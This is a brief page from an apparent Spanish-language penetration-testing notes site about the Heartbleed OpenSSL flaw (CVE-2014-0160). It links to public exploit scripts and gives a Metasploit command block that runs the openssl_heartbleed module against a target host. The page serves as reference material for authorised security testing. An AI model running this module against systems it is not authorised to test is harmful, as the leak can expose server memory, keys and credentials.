> For the complete documentation index, see [llms.txt](https://pentesting.mrw0l05zyn.cl/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://pentesting.mrw0l05zyn.cl/explotacion/vulnerabilidades/heartbleed-cve-2014-0160.md).

# Heartbleed (CVE-2014-0160)

## Exploits

* <https://github.com/MrW0l05zyn/pentesting/blob/master/exploits/heartbleed/heartbleed.py>
* <https://www.exploit-db.com/exploits/32745>

## Metasploit

```sh
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS <target>
set VERBOSE true
run
```
